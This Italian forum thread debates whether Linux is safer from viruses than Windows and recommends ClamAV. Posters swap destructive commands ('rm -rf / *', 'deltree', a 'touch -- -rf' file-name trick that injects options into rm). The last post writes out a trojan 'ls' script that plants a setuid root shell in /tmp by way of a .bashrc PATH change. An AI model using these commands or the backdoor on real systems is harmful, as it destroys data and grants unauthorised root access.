Notare le virgolette anti-flame, che stanno a significare: si-i-virus-ci-sono-lo-so-ma-a-me-come-al -99%-degli-utenti-Linux-arrivano-solo-i-WIN32.MyDoom-e-soci :D


quest'articolo su LinuxHelp (http://www.linuxhelp.it/modules.php?name=News&file=article&sid=1777) spiega la cosa in modo molto semplice, senza andare a discettare di Kernel e di cose complicate: l'utente medio Windows usa lo stesso Windows di milioni di altri utenti, e gli stessi programmi ( IE e OE ) così tanto vulnerabili ai virus. La diversificazione che esiste nel campo delle distribuzioni Linux e dei software di navigazione rende la vita molto più difficile a chi vuole scriverci virus, anche se dall'altro lato l'utente novizio può essere spaventato da un'apparente enorme complessità del sistema.

Tutto qui. Utenti Windows, usate Mozilla mail o Eudora o qualsiasi altra cosa che non sia Outlook, e avrete qualche speranza in più di sfuggire ai virus senza dover comprarvi l'antivirus e tenerlo in background tutto il tempo a sprecar risorse... oppure passate a Linux e fate prima :D

piccolo post per dire:
è vero una buona parte dei virus (come pure trojan e worm) più che essere "per windows" sono più specificamente "per IE e outlook" ...:rolleyes: :asd:

2 programmi che per fortuna vostra, non piagano nessun altro OS...

err

prima o dopo arriveranno anche altri virus per linux...
godiamoci un po' di tranquillità si fa per dire...

ma voi usate qualche antivirus su linux?
se si, quale?

thanx

tommy

io nn ho mai usato antivirus in vita mia ne su linux ne su windows e nn mi sono mai beccato nemmeno un virus!

Originariamente inviato da khri81
io nn ho mai usato antivirus in vita mia ne su linux ne su windows e nn mi sono mai beccato nemmeno un virus!

mi sa che hai un bel ( | )

LOL
:D

Tommy

Piu' che altro qundo linux schiaccera microsoft.. e tutti utilizeranno linux.. vedrai che nn ci saranno piu' virus x winzoz.. ma solo x linux :)

Originariamente inviato da Psycotic
Piu' che altro qundo linux schiaccera microsoft.. e tutti utilizeranno linux.. vedrai che nn ci saranno piu' virus x winzoz.. ma solo x linux :)



ma non credo.. è molto più difficile tecnicamente fare un virus per linux che uno per windows... faccio un piccolo esempio:

con windows, per cancellare tutto, basta fare

cd \
deltree *


con linux, per fare quello devi già avere i privilegi di root... per carità, non sarà impossibile, ma penso che scrivere un virus in grado di farlo, considerando le diversità che ci sono da una distribuzione all'altra, le versioni ecc... penso sia già un pò complicatuccio :D

Solo questione di applicarsi al problema.. Io personalmente qualche tempo fa ho provato un explua' nn so come si scriva pardon :) x ftp.. mi pare fosse wu-ftp.. e si entrava alla grande..

Originariamente inviato da Psycotic
Solo questione di applicarsi al problema.. Io personalmente qualche tempo fa ho provato un explua' nn so come si scriva pardon :) x ftp.. mi pare fosse wu-ftp.. e si entrava alla grande..

exploit != virus.

Nessuno nega che *nix abbia, ha avuto, avra` problemi di sicurezza.
Molti, tra cui io ( :) ) sono molto scettici sulla coppia "virus e linux".

Originariamente inviato da Psycotic
Solo questione di applicarsi al problema.. Io personalmente qualche tempo fa ho provato un explua' nn so come si scriva pardon :) x ftp.. mi pare fosse wu-ftp.. e si entrava alla grande..


si, ma immagino che quell'exploit fosse solo per wuftp, e per una (o più) determinata versione... tutti gli altri erano immuni

su windows, se trovi un exploit per internet exploder versione 6.0 sei sicuro che becchi il 90% di chi usa windows, su linux il panorama applicativi è molto più vario, al limite potrai beccarne un 30%, a esagerare... secondo me

Piuttosto.... noi siamo abituati, anzi sappiamo che è sempre bene aggiornare il sistema, proprio per correggere bachi che permettono gli exploit. Ma chi usa windows è abituato a ragionare così? No! E se queste persone pari pari si mettono ad usare linux, come andrà a finire? Che si troveranno i sistemi bacati e non patchati... e così gli exploit, anche se meno, cominceranno a dare noie. Riflettiamo su questo ragazzi :(

Originariamente inviato da lnessuno
ma non credo.. è molto più difficile tecnicamente fare un virus per linux che uno per windows... faccio un piccolo esempio:

con windows, per cancellare tutto, basta fare

cd \
deltree *


con linux, per fare quello devi già avere i privilegi di root... per carità, non sarà impossibile, ma penso che scrivere un virus in grado di farlo, considerando le diversità che ci sono da una distribuzione all'altra, le versioni ecc... penso sia già un pò complicatuccio :D

mmm

Originariamente inviato da Hrc211v
mmm



ciao culatello, vieni a farti un giro su #hwotaku :D

Originariamente inviato da jappilas
piccolo post per dire:
è vero una buona parte dei virus (come pure trojan e worm) più che essere "per windows" sono più specificamente "per IE e outlook" ...:rolleyes: :asd:

2 programmi che per fortuna vostra, non piagano nessun altro OS...

mi autosmentisco ( :eek: ) perchè mi è venuto un notevole dubbio... IE e Outlook esistono anche sotto MAC OS... O_o

per cui: hanno portato pari pari anche i difetti della versione win, oppure beneficiano dell' architettura rhapsody/darwin/mach/ che è (presumo) intrinsecamente meno vulnerabile in quanto *nix-derived? ;)

Originariamente inviato da lnessuno
ma non credo.. è molto più difficile tecnicamente fare un virus per linux che uno per windows... faccio un piccolo esempio:

con windows, per cancellare tutto, basta fare

cd \
deltree *


con linux, per fare quello devi già avere i privilegi di root... per carità, non sarà impossibile, ma penso che scrivere un virus in grado di farlo, considerando le diversità che ci sono da una distribuzione all'altra, le versioni ecc... penso sia già un pò complicatuccio :D


stessa cosa su un Windows amministrato decentemente e in cui l'utonto non usi solo Administrator.

Per quel che riguarda gli exploit, il problema è il medesimo su Windows e su Linux, anzi, per dirla tutta, il promo worm è nato in ambiente unix. Si tratta semplicemente di sfruttare bug di un qualche processo che giri con privilegi alti (root su unix, administrator o system su Windows (NT+) ) per acquisirne i privilegi e fare poi ciò che si vuole nel sistema. Su Linux è più difficile perchè è un po' meno colabrodo di Windows, molto molto meno diffuso e gli utenti in generale sono più sgamati :D

Per esempio MyDoom si diffonde via email e gli autori hanno utilizzato tecniche di social engineering (lo convincono spacciandosi per il servizio assistenza ms o vaccate simili) per far si che l'utonto medio Windows facesse un bel doppio click sull'allegato della mail. Stessa cosa potrebbe succedere su Linux, solo che in media l'utente Linux non è così tonno da farlo e cestina la mail con una crassa risata. Davanti a cosa del genere non c'è molto da fare. Se il programma pincopallino per linux, gira con privilegi superuser, ha un bug e l'utonto fa doppio click sul programmino che sfrutta questo bug il sistema è compromesso come su Windows.

Riassumendo: i virus esistono perchè ci sono gli exploit.

Originariamente inviato da alexmaz
stessa cosa su un Windows amministrato decentemente e in cui l'utonto non usi solo Administrator.


si questo è vero... ma sinceramente non ho mai visto nessuno usare un windows non da amministratore... :D

Originariamente inviato da alexmaz
Stessa cosa potrebbe succedere su Linux, solo che in media l'utente Linux non è così tonno da farlo e cestina la mail con una crassa risata.
Scherzi ? Scommetto che se facessero un worm che si spaccia per il giochino flash del pinguino che gira ultimamente, linux o non linux... :D

Originariamente inviato da /\/\@®¢Ø
Scherzi ? Scommetto che se facessero un worm che si spaccia per il giochino flash del pinguino che gira ultimamente, linux o non linux... :D



io non lo beccherei perchè flash mi da un sacco di problemi :D

ok ragazzi, ma quindi "servirebbe" un antivirus?

tommy

Originariamente inviato da tommydc
ok ragazzi, ma quindi "servirebbe" un antivirus?

tommy

l'antivirus ti serve se:
1) hai un server di posta e i client possono essere anche windows
2) ti scarichi la posta sotto linux e ti vuoi guardare tutti i .exe che ti mandano sotto windows (e quindi prima te li passi con l'antivirus)


Se ti scarichi la posta in linux e non vuoi provare tutti i .exe che contengono programmi che ti aiutano ad allungare il tuo membro!, l'antivirus non ti serve!

Ciao

P.S. sul serio mi e' arrivata una mail con allegato un .exe e nella mail c'era scritto che cliccando sul .exe e seguendo le istruzioni ti potevi ritrovare con 5cm in piu' nel giro di un mese!.... non sanno piu' cosa inventarsi!

Originariamente inviato da HexDEF6
l'antivirus ti serve se:
1) hai un server di posta e i client possono essere anche windows
2) ti scarichi la posta sotto linux e ti vuoi guardare tutti i .exe che ti mandano sotto windows (e quindi prima te li passi con l'antivirus)


Se ti scarichi la posta in linux e non vuoi provare tutti i .exe che contengono programmi che ti aiutano ad allungare il tuo membro!, l'antivirus non ti serve!

Ciao

P.S. sul serio mi e' arrivata una mail con allegato un .exe e nella mail c'era scritto che cliccando sul .exe e seguendo le istruzioni ti potevi ritrovare con 5cm in piu' nel giro di un mese!.... non sanno piu' cosa inventarsi!

sei stato chiarissimo, visto che a me interessa solo il messaggio e non l'allegato credo di stare tranquillo.
Ad ogni modo cercando per un antivirus per linux non è che abbia trovato nulla di particolare, tu hai consigli?

grazie

tommy

p.s. 5cm in un mese.....60cm in un anno, potresti fare il porno star....LOL
:D

Originariamente inviato da tommydc
sei stato chiarissimo, visto che a me interessa solo il messaggio e non l'allegato credo di stare tranquillo.
Ad ogni modo cercando per un antivirus per linux non è che abbia trovato nulla di particolare, tu hai consigli?


http://www.clamav.net/

questo e' quello che uso su i miei mail server


Originariamente inviato da tommydc
grazie

tommy

p.s. 5cm in un mese.....60cm in un anno, potresti fare il porno star....LOL
:D

Cavolo... ho gia cancellato la mail con l'allegato... non ci avevo pensato!
:D :D

Originariamente inviato da HexDEF6
http://www.clamav.net/

questo e' quello che uso su i miei mail server




Cavolo... ho gia cancellato la mail con l'allegato... non ci avevo pensato!
:D :D

ah si, lo avevo scaricato tempo fa ma ero diventato scemo per configurarlo.
Hai qualche dritta per configurarlo in modo che scannerizzi la posta che scarico con kmail?
Inoltre non ho capito come fare per aggiornare le firme.

grazie

tommy

Originariamente inviato da tommydc
ah si, lo avevo scaricato tempo fa ma ero diventato scemo per configurarlo.
Hai qualche dritta per configurarlo in modo che scannerizzi la posta che scarico con kmail?
Inoltre non ho capito come fare per aggiornare le firme.

grazie

tommy

per aggiornare il database dei virus, basta lanciare da root freshclam

per usarlo insieme ad un client di posta (non l'ho mai fatto) dovresti usare:
http://clamdmail.sourceforge.net/


prova a leggere anche qui:
http://www.mail-archive.com/clamav-users@lists.sourceforge.net/msg00998.html

Ciao!

Originariamente inviato da HexDEF6
per aggiornare il database dei virus, basta lanciare da root freshclam

per usarlo insieme ad un client di posta (non l'ho mai fatto) dovresti usare:
http://clamdmail.sourceforge.net/


prova a leggere anche qui:
http://www.mail-archive.com/clamav-users@lists.sourceforge.net/msg00998.html

Ciao!

thanx mille

tommy

Originariamente inviato da alexmaz


Per esempio MyDoom si diffonde via email e gli autori hanno utilizzato tecniche di social engineering (lo convincono spacciandosi per il servizio assistenza ms o vaccate simili) per far si che l'utonto medio Windows facesse un bel doppio click sull'allegato della mail. Stessa cosa potrebbe succedere su Linux, solo che in media l'utente Linux non è così tonno da farlo e cestina la mail con una crassa risata. Davanti a cosa del genere non c'è molto da fare.

beh non è così semplicistico come dici tu
linux non è piu' sicuro solo perchè l'utente medio è piu' "sgamato"

considera il fatto che sotto linux i files eseguibli non si riconoscono da un estensione, ma da un attributo che non puo' essere mandato via allegato.... cioe' se mandi un eseguibile linux(eseguibile sulla tua macchina) al destinatario arriverà si il file ma non sarà in grado di eseguirlo... solo cambiando gli attributi sullo stesso poi torna eseguibile
e se lo lanci da utente poi farai i danni solo all'interno dei privilegi dell'utente e non metti a repentaglio tutto il sistema

...se lo lanci da root sei un cretino e ti meriti che perdi tutto :D



P.S. X Tommy: Gli antivirus per linux NON sono antivirus per i sistemi linux, o meglio, girano sotto linux ma servono a cercare i virus sui sistemi windows e servono SOLO se la linuxbox fa da server....

Originariamente inviato da /\/\@®¢Ø
Scherzi ? Scommetto che se facessero un worm che si spaccia per il giochino flash del pinguino che gira ultimamente, linux o non linux... :D

:asd:

Originariamente inviato da Crisa...
beh non è così semplicistico come dici tu
linux non è piu' sicuro solo perchè l'utente medio è piu' "sgamato"

considera il fatto che sotto linux i files eseguibli non si riconoscono da un estensione, ma da un attributo che non puo' essere mandato via allegato.... cioe' se mandi un eseguibile linux(eseguibile sulla tua macchina) al destinatario arriverà si il file ma non sarà in grado di eseguirlo... solo cambiando gli attributi sullo stesso poi torna eseguibile
e se lo lanci da utente poi farai i danni solo all'interno dei privilegi dell'utente e non metti a repentaglio tutto il sistema

...se lo lanci da root sei un cretino e ti meriti che perdi tutto :D

anche Windows ha i permessi di esecuzione, sinceramente però non so come si comporti Linux in fatto di allegati eseguibili.

Non è vero invece che su Linux puoi fare danni all'interno dei privilegi dell'utente, altrimenti non esisterebbero attacchi su linux e invece ci sono. Puoi elevare i tuoi privilegi anche su linux sfruttando un bug di qualcosa che gira con privilegi root, esattamente come su Windows.

Originariamente inviato da Crisa...
P.S. X Tommy: Gli antivirus per linux NON sono antivirus per i sistemi linux, o meglio, girano sotto linux ma servono a cercare i virus sui sistemi windows e servono SOLO se la linuxbox fa da server....

bè però le cartelle win sono accessibili da linux anche se ho suse su un hd e win su di un altro, quindi forse qualche rischio esiste.

tommy

Originariamente inviato da tommydc
bè però le cartelle win sono accessibili da linux anche se ho suse su un hd e win su di un altro, quindi forse qualche rischio esiste.

tommy

ntfs non è scrivibile da linux.... se hai la fat, beh stai attento che lavorandoci sopra rischi di cancellare inavvertitamente files importanti per il sistema(è piu' probabile che i danni li fai tu rispetto a qualche virus)

Originariamente inviato da alexmaz
anche Windows ha i permessi di esecuzione, sinceramente però non so come si comporti Linux in fatto di allegati eseguibili.

Non è vero invece che su Linux puoi fare danni all'interno dei privilegi dell'utente, altrimenti non esisterebbero attacchi su linux e invece ci sono. Puoi elevare i tuoi privilegi anche su linux sfruttando un bug di qualcosa che gira con privilegi root, esattamente come su Windows.

per la prima, un files exe è comunque eseguibile se ti arriva via email.... considera che il 99% delle persone lavora sotto windows come administrator

ci sono talmente tante versioni dei pacchetti che quasi sicuramente un virus che attacca un servizio, per esempio in versione 3.21 difficilmente riuscirà a sfruttare lo stesso servizio in versione 3.22 o 3.20.... poi c'e' il fatto delle librerie di sistema a cui il virus si deve per forza appoggiare (difficilmente puo' portarsi dietro mega e mega di librerie); in windows sono standard e sono identiche per win nt win 2000 e win xp, sotto linux vengono aggiornate in continuazione e se viene scoperto un bug viene immediatamente corretto nella versione successiva.. non è come il bug dell'rpc (blaster) che va in giro da quando esiste nt4 e era tuttaltro che sconosciuto agli "addetti ai lavori"

non dico che non è possibile arrivare ai privilegi di root, ma le variabili sono molte, a differenza di windows...

Originariamente inviato da lnessuno
ma non credo.. è molto più difficile tecnicamente fare un virus per linux che uno per windows... faccio un piccolo esempio:

con windows, per cancellare tutto, basta fare

cd \
deltree *


con linux, per fare quello devi già avere i privilegi di root... per carità, non sarà impossibile, ma penso che scrivere un virus in grado di farlo, considerando le diversità che ci sono da una distribuzione all'altra, le versioni ecc... penso sia già un pò complicatuccio :D

adesso, io non uso linux da molto e concordo sul discorso che su Linux sarà più difficile avere l'accesso di root, un pò per come è strutturato l'OS e anche perchè al contrario di Win2k/Xp non è che se non sei admin praticamente non puoi fare nulla (cioè su Win2k se non sei admin alcuni giochi non partono :eek: e non c'è forse di cambiare qualcosa per farli andare... ), ma il comando per piallare tutto su Linux è anche peggio: rm -rf / * :D e come comando non è affatto distro-dipendente e pialla veramente tutto ciò che incontra :D


PS: una storiella divertente sull'argomento http://www.geocities.com/krishna_kunchith/misc/rm.html

rm -fr / *

1) funziona se sei root
2) funziona se sei utente solo nelle cartelle che hanno come proprietario l'utente
3) se dovessi fare un virus io farei qualcosa di più subdolo :sofico:
4) se non hai i permessi per "attraversare" una dir di sistema da utente rm -fr / * non fa nulla

ciao
Arpeda

Originariamente inviato da Arpeda
1) funziona se sei root
2) funziona se sei utente solo nelle cartelle che hanno come proprietario l'utente
3) se dovessi fare un virus io farei qualcosa di più subdolo :sofico:
4) se non hai i permessi per "attraversare" una dir di sistema da utente rm -fr / * non fa nulla

ciao
Arpeda

Linux (Unix) e' peggio da questo lato perche' almeno sotto windows c'e' il lock sui file (in linux puoi divertirti a togliere un file 'da sotto i piedi' ad un altro programma).
Se usato correttamente NT e' sicuro tanto quanto Linux da questo punto di vista (anzi, ha da tempo un controllo molto piu' sofisticato sui permessi)
Tra l'altro l'esempio mi fa venire in mente l'intelligenza delle utility linux...
ad esempio con i seguenti comandi
touch -- -r
rm *
non eliminerai solo i file della directory corrente :D

Originariamente inviato da /\/\@®¢Ø
Linux (Unix) e' peggio da questo lato perche' almeno sotto windows c'e' il lock sui file (in linux puoi divertirti a togliere un file 'da sotto i piedi' ad un altro programma).
Se usato correttamente NT e' sicuro tanto quanto Linux da questo punto di vista (anzi, ha da tempo un controllo molto piu' sofisticato sui permessi)
Tra l'altro l'esempio mi fa venire in mente l'intelligenza delle utility linux...
ad esempio con i seguenti comandi
touch -- -r
rm *
non eliminerai solo i file della directory corrente :D


per la prima parte hai pienamente ragione.
pe la seconda parte. Il giochino è fichissimo .. :D
ma può essere tranquillamente controllato con un alias
alias rm='rm -i'

ciao

Originariamente inviato da Arpeda
per la prima parte hai pienamente ragione.
pe la seconda parte. Il giochino è fichissimo .. :D
ma può essere tranquillamente controllato con un alias
alias rm='rm -i'

ciao
Allora io ti piazzo un

touch -- -rf

Cosi' il -f prende il sopravvento sul tuo -i :p

Originariamente inviato da /\/\@®¢Ø
Allora io ti piazzo un

touch -- -rf

Cosi' il -f prende il sopravvento sul tuo -i :p

alias rm='rm -i --'
:D

O_o
ma cos' è ? una sfida a colpi di comandi console?

lol :D

Mi sto semplicemente dilettando con lo
"UNIX-Haters handbook" :D

comunque non ci si scappa...
con l'ultimo alias ti precludi tutte le possibili opzioni :D

Originariamente inviato da Arpeda
alias rm='rm -i --'
:D

mi correggo il -- nn può essere messo all'interno dell'alias altrimenti non si possono passare parametri a rm ... ho perso la sfida ... :cry:

come dice Marco è un problema filosofico .... ;)

Ciao

Originariamente inviato da franklar
La diversificazione che esiste nel campo delle distribuzioni Linux e dei software di navigazione rende la vita molto più difficile a chi vuole scriverci virus, anche se dall'altro lato l'utente novizio può essere spaventato da un'apparente enorme complessità del sistema.

permettimi ma credo sia molto + semplice la questione...

ipotizziamo un virus...


$ rm -r /etc
...
































....










Enter the password for "root":


:D

era già stato detto...
:)

tenete a mente un particolare... un qualunque virus cercherà di guadagnare i privilegi di root perchè chi lo scrive sa benissimo che senza non combinerà molto. Per fare questo utilizzerà un exploit che in qualche modo lo rende root. Il bello è che un exploit che funziona da me può tranquillamente non funzionare da te e viceversa... oppure come nel caso del baco trovato nel 2.4.23 che ha portato all'uscita prematura del 2.4.24: da me magari funziona, da te no... mettiamo poi che il kernel sia patchato (tipo mandrake e redhat) non funzionerà nemmeno li.... insomma la diversificazione che c'è su linux rende cmq un virus "poco" offensivo xchè, se non viene eseguito da root, si troverà di fronte situazioni da esaminare caso per caso e quindi le probabilità di successo diventeranno scarse.

In definitiva: di virus per linux ce ne sono, e si può ipotizzare che in futuro sempre più gente si metterà a scriverne. Ma seguendo il ragionamento sopra si può prevedere che questi virus possano colpire sempre un numero non esagerato di computer. non saremo mai di fronte ad una situazione come il blaster di questa estate insomma.

La questione mydoom invece è tutta un'altra cosa. la si vede solo quanto sia facile ingannare la gente.

io in /varie/ms_vrz
ho una copia funzionante del blast, del doom e altre cazzatelle varie...

:D

Originariamente inviato da ShadowThrone
io in /varie/ms_vrz
ho una copia funzionante del blast, del doom e altre cazzatelle varie...

:D

O_o ... vuoi mettere su uno zoo di virus? :D :asd:

Originariamente inviato da jappilas
O_o ... vuoi mettere su uno zoo di virus? :D :asd:
thz! ho riempito un cd :D
se vuoi ti faccio una copia :sofico:

Originariamente inviato da NA01
thz! ho riempito un cd :D
se vuoi ti faccio una copia :sofico:

grande! poi stampiamo la cover con su scritto "windows 2000 resource kit" :asd:

non è che voglio fare uno zoo, è che mi arrivano via mail, e io come un bambino clikko sul file ma non succede nulla... :sofico:

Originariamente inviato da Cimi
permettimi ma credo sia molto + semplice la questione...

ipotizziamo un virus...
<cut>
:D

Piu' semplice. Metti nella tua home il seguente file chiamato ls

#!/bin/sh
cp /bin/sh /tmp/.shl
chmod 4755 /tmp/.shl
exec /bin/ls \$1 \$2 \$3 \$

Basta che un virus modifichi il tuo .bashrc in modo che aggiunga la directory corrente al path ed appena fai un ls da root nella tua home il virus ha una shell suid root pronta all'uso :p :D